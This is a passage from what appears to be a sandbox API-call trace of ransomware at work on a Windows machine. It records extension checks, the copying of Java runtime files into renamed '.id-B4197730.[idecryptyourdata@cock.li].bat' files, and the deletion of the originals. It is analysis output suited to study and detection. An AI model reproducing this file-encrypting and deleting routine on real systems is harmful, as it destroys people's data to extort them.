(lpString1=".dbf", lpString2=".exe") returned -1 [0198.662] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\policytool.exe") returned 53 [0198.662] lstrlenW (lpString=".1cd") returned 4 [0198.662] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0198.662] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\policytool.exe") returned 53 [0198.662] lstrlenW (lpString=".jpg") returned 4 [0198.662] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0198.663] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\policytool.exe") returned 53 [0198.663] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\policytool.exe") returned 53 [0198.663] lstrlenW (lpString=".doc") returned 4 [0198.663] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0198.663] lstrlenW (lpString=".docx") returned 5 [0198.663] lstrcmpiW (lpString1=".docx", lpString2="l.exe") returned -1 [0198.663] lstrlenW (lpString=".pdf") returned 4 [0198.663] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0198.663] lstrlenW (lpString=".xls") returned 4 [0198.663] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0198.663] lstrlenW (lpString=".xlsx") returned 5 [0198.663] lstrcmpiW (lpString1=".xlsx", lpString2="l.exe") returned -1 [0198.663] lstrlenW (lpString=".ppt") returned 4 [0198.663] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0198.663] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\policytool.exe") returned 53 [0198.663] lstrlenW (lpString=".zip") returned 4 [0198.663] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0198.663] lstrlenW (lpString=".rar") returned 4 [0198.663] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0198.663] lstrlenW (lpString=".bz2") returned 4 [0198.663] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0198.663] lstrlenW (lpString=".7z") returned 3 [0198.663] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0198.663] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\policytool.exe") returned 53 [0198.663] lstrlenW (lpString=".dbf") returned 4 [0198.663] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0198.663] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\policytool.exe") returned 53 [0198.663] lstrlenW (lpString=".1cd") returned 4 [0198.663] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0198.663] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\policytool.exe") returned 53 [0198.663] lstrlenW (lpString=".jpg") returned 4 [0198.663] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0198.663] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0198.664] lstrlenW (lpString="prism_common.dll") returned 16 [0198.664] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_common.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\prism_common.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0198.664] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x34dff14 | out: lpFileSize=0x34dff14*=57408) returned 1 [0198.664] CloseHandle (hObject=0x350) returned 1 [0198.664] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_common.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\prism_common.dll")) returned 0x20 [0198.664] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_common.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\prism_common.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0198.664] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_common.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\prism_common.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0198.664] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.664] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.665] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_common.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\prism_common.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0198.665] GetLastError () returned 0x0 [0198.665] ReadFile (in: hFile=0x350, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0xe040, lpOverlapped=0x0) returned 1 [0198.704] WriteFile (in: hFile=0x3a0, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0xe050, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0xe050, lpOverlapped=0x0) returned 1 [0198.706] ReadFile (in: hFile=0x350, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x0, lpOverlapped=0x0) returned 1 [0198.706] WriteFile (in: hFile=0x3a0, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0xf4, lpOverlapped=0x0) returned 1 [0198.706] SetEndOfFile (hFile=0x3a0) returned 1 [0198.706] CloseHandle (hObject=0x3a0) returned 1 [0198.706] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.706] SetEndOfFile (hFile=0x350) returned 1 [0198.707] CloseHandle (hObject=0x350) returned 1 [0198.707] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_common.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0199.301] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_common.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\prism_common.dll")) returned 1 [0199.301] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_common.dll") returned 55 [0199.301] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_common.dll") returned 55 [0199.301] lstrlenW (lpString=".doc") returned 4 [0199.301] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0199.301] lstrlenW (lpString=".docx") returned 5 [0199.301] lstrcmpiW (lpString1=".docx", lpString2="n.dll") returned -1 [0199.301] lstrlenW (lpString=".pdf") returned 4 [0199.301] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0199.301] lstrlenW (lpString=".xls") returned 4 [0199.301] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0199.301] lstrlenW (lpString=".xlsx") returned 5 [0199.301] lstrcmpiW (lpString1=".xlsx", lpString2="n.dll") returned -1 [0199.301] lstrlenW (lpString=".ppt") returned 4 [0199.301] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0199.301] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_common.dll") returned 55 [0199.301] lstrlenW (lpString=".zip") returned 4 [0199.302] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0199.302] lstrlenW (lpString=".rar") returned 4 [0199.302] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0199.302] lstrlenW (lpString=".bz2") returned 4 [0199.302] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0199.302] lstrlenW (lpString=".7z") returned 3 [0199.302] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0199.302] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_common.dll") returned 55 [0199.302] lstrlenW (lpString=".dbf") returned 4 [0199.302] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0199.302] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_common.dll") returned 55 [0199.302] lstrlenW (lpString=".1cd") returned 4 [0199.302] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0199.302] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_common.dll") returned 55 [0199.302] lstrlenW (lpString=".jpg") returned 4 [0199.302] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0199.302] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_common.dll") returned 55 [0199.302] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_common.dll") returned 55 [0199.302] lstrlenW (lpString=".doc") returned 4 [0199.302] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0199.302] lstrlenW (lpString=".docx") returned 5 [0199.302] lstrcmpiW (lpString1=".docx", lpString2="n.dll") returned -1 [0199.302] lstrlenW (lpString=".pdf") returned 4 [0199.302] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0199.302] lstrlenW (lpString=".xls") returned 4 [0199.302] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0199.302] lstrlenW (lpString=".xlsx") returned 5 [0199.302] lstrcmpiW (lpString1=".xlsx", lpString2="n.dll") returned -1 [0199.302] lstrlenW (lpString=".ppt") returned 4 [0199.302] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0199.302] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_common.dll") returned 55 [0199.302] lstrlenW (lpString=".zip") returned 4 [0199.302] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0199.302] lstrlenW (lpString=".rar") returned 4 [0199.303] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0199.303] lstrlenW (lpString=".bz2") returned 4 [0199.303] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0199.303] lstrlenW (lpString=".7z") returned 3 [0199.303] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0199.303] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_common.dll") returned 55 [0199.303] lstrlenW (lpString=".dbf") returned 4 [0199.303] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0199.303] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_common.dll") returned 55 [0199.303] lstrlenW (lpString=".1cd") returned 4 [0199.303] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0199.303] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_common.dll") returned 55 [0199.303] lstrlenW (lpString=".jpg") returned 4 [0199.303] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0199.303] lstrcmpiW (lpString1=".exe", lpString2=".bat") returned 1 [0199.303] lstrlenW (lpString="servertool.exe") returned 14 [0199.303] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\servertool.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\servertool.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0199.304] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0x34dff14 | out: lpFileSize=0x34dff14*=16448) returned 1 [0199.304] CloseHandle (hObject=0x3a8) returned 1 [0199.304] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\servertool.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\servertool.exe")) returned 0x20 [0199.304] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\servertool.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\servertool.exe.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0199.304] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\servertool.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\servertool.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0199.304] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.304] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.304] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\servertool.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\servertool.exe.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x35c [0199.305] GetLastError () returned 0x0 [0199.305] ReadFile (in: hFile=0x3a8, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x4040, lpOverlapped=0x0) returned 1 [0199.416] WriteFile (in: hFile=0x35c, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0x4050, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0x4050, lpOverlapped=0x0) returned 1 [0199.418] ReadFile (in: hFile=0x3a8, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x0, lpOverlapped=0x0) returned 1 [0199.418] WriteFile (in: hFile=0x35c, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0xf0, lpOverlapped=0x0) returned 1 [0199.418] SetEndOfFile (hFile=0x35c) returned 1 [0199.418] CloseHandle (hObject=0x35c) returned 1 [0199.418] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.418] SetEndOfFile (hFile=0x3a8) returned 1 [0199.419] CloseHandle (hObject=0x3a8) returned 1 [0199.419] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\servertool.exe.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0199.419] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\servertool.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\servertool.exe")) returned 1 [0199.420] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\servertool.exe") returned 53 [0199.420] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\servertool.exe") returned 53 [0199.420] lstrlenW (lpString=".doc") returned 4 [0199.420] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0199.420] lstrlenW (lpString=".docx") returned 5 [0199.420] lstrcmpiW (lpString1=".docx", lpString2="l.exe") returned -1 [0199.420] lstrlenW (lpString=".pdf") returned 4 [0199.420] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0199.420] lstrlenW (lpString=".xls") returned 4 [0199.420] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0199.420] lstrlenW (lpString=".xlsx") returned 5 [0199.420] lstrcmpiW (lpString1=".xlsx", lpString2="l.exe") returned -1 [0199.420] lstrlenW (lpString=".ppt") returned 4 [0199.420] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0199.420] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\servertool.exe") returned 53 [0199.420] lstrlenW (lpString=".zip") returned 4 [0199.420] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0199.420] lstrlenW (lpString=".rar") returned 4 [0199.420] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0199.420] lstrlenW (lpString=".bz2") returned 4 [0199.420] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0199.420] lstrlenW (lpString=".7z") returned 3 [0199.420] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0199.420] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\servertool.exe") returned 53 [0199.420] lstrlenW (lpString=".dbf") returned 4 [0199.420] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0199.420] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\servertool.exe") returned 53 [0199.420] lstrlenW (lpString=".1cd") returned 4 [0199.420] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0199.420] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\servertool.exe") returned 53 [0199.420] lstrlenW (lpString=".jpg") returned 4 [0199.420] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0199.420] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\servertool.exe") returned 53 [0199.420] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\servertool.exe") returned 53 [0199.420] lstrlenW (lpString=".doc") returned 4 [0199.420] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0199.421] lstrlenW (lpString=".docx") returned 5 [0199.421] lstrcmpiW (lpString1=".docx", lpString2="l.exe") returned -1 [0199.421] lstrlenW (lpString=".pdf") returned 4 [0199.421] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0199.421] lstrlenW (lpString=".xls") returned 4 [0199.421] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0199.421] lstrlenW (lpString=".xlsx") returned 5 [0199.421] lstrcmpiW (lpString1=".xlsx", lpString2="l.exe") returned -1 [0199.421] lstrlenW (lpString=".ppt") returned 4 [0199.421] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0199.421] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\servertool.exe") returned 53 [0199.421] lstrlenW (lpString=".zip") returned 4 [0199.421] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0199.421] lstrlenW (lpString=".rar") returned 4 [0199.421] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0199.421] lstrlenW (lpString=".bz2") returned 4 [0199.421] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0199.421] lstrlenW (lpString=".7z") returned 3 [0199.421] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0199.421] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\servertool.exe") returned 53 [0199.421] lstrlenW (lpString=".dbf") returned 4 [0199.421] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0199.421] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\servertool.exe") returned 53 [0199.421] lstrlenW (lpString=".1cd") returned 4 [0199.421] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0199.421] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\servertool.exe") returned 53 [0199.421] lstrlenW (lpString=".jpg") returned 4 [0199.421] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0199.421] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0199.421] lstrlenW (lpString="ssv.dll") returned 7 [0199.422] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssv.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\ssv.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0199.422] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0x34dff14 | out: lpFileSize=0x34dff14*=571968) returned 1 [0199.422] CloseHandle (hObject=0x3a8) returned 1 [0199.422] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssv.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\ssv.dll")) returned 0x20 [0199.422] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssv.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\ssv.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0199.422] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssv.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\ssv.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0199.422] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.423] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.423] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssv.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\ssv.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x35c [0199.423] GetLastError () returned 0x0 [0199.423] ReadFile (in: hFile=0x3a8, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x8ba40, lpOverlapped=0x0) returned 1 [0199.709] WriteFile (in: hFile=0x35c, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0x8ba50, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0x8ba50, lpOverlapped=0x0) returned 1 [0199.717] ReadFile (in: hFile=0x3a8, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x0, lpOverlapped=0x0) returned 1 [0199.717] WriteFile (in: hFile=0x35c, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0xe2, lpOverlapped=0x0) returned 1 [0199.718] SetEndOfFile (hFile=0x35c) returned 1 [0199.718] CloseHandle (hObject=0x35c) returned 1 [0199.718] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.718] SetEndOfFile (hFile=0x3a8) returned 1 [0199.723] CloseHandle (hObject=0x3a8) returned 1 [0199.723] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssv.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0199.723] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssv.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\ssv.dll")) returned 1 [0199.723] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssv.dll") returned 46 [0199.723] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssv.dll") returned 46 [0199.723] lstrlenW (lpString=".doc") returned 4 [0199.723] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0199.723] lstrlenW (lpString=".docx") returned 5 [0199.723] lstrcmpiW (lpString1=".docx", lpString2="v.dll") returned -1 [0199.723] lstrlenW (lpString=".pdf") returned 4 [0199.723] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0199.723] lstrlenW (lpString=".xls") returned 4 [0199.723] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0199.723] lstrlenW (lpString=".xlsx") returned 5 [0199.723] lstrcmpiW (lpString1=".xlsx", lpString2="v.dll") returned -1 [0199.724] lstrlenW (lpString=".ppt") returned 4 [0199.724] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0199.724] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssv.dll") returned 46 [0199.724] lstrlenW (lpString=".zip") returned 4 [0199.724] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0199.724] lstrlenW (lpString=".rar") returned 4 [0199.724] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0199.724] lstrlenW (lpString=".bz2") returned 4 [0199.724] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0199.724] lstrlenW (lpString=".7z") returned 3 [0199.724] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0199.724] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssv.dll") returned 46 [0199.724] lstrlenW (lpString=".dbf") returned 4 [0199.724] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0199.724] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssv.dll") returned 46 [0199.724] lstrlenW (lpString=".1cd") returned 4 [0199.724] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0199.724] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssv.dll") returned 46 [0199.724] lstrlenW (lpString=".jpg") returned 4 [0199.724] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0199.724] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssv.dll") returned 46 [0199.724] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssv.dll") returned 46 [0199.724] lstrlenW (lpString=".doc") returned 4 [0199.724] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0199.724] lstrlenW (lpString=".docx") returned 5 [0199.724] lstrcmpiW (lpString1=".docx", lpString2="v.dll") returned -1 [0199.724] lstrlenW (lpString=".pdf") returned 4 [0199.724] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0199.724] lstrlenW (lpString=".xls") returned 4 [0199.724] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0199.724] lstrlenW (lpString=".xlsx") returned 5 [0199.725] lstrcmpiW (lpString1=".xlsx", lpString2="v.dll") returned -1 [0199.725] lstrlenW (lpString=".ppt") returned 4 [0199.725] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0199.725] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssv.dll") returned 46 [0199.725] lstrlenW (lpString=".zip") returned 4 [0199.725] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0199.725] lstrlenW (lpString=".rar") returned 4 [0199.725] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 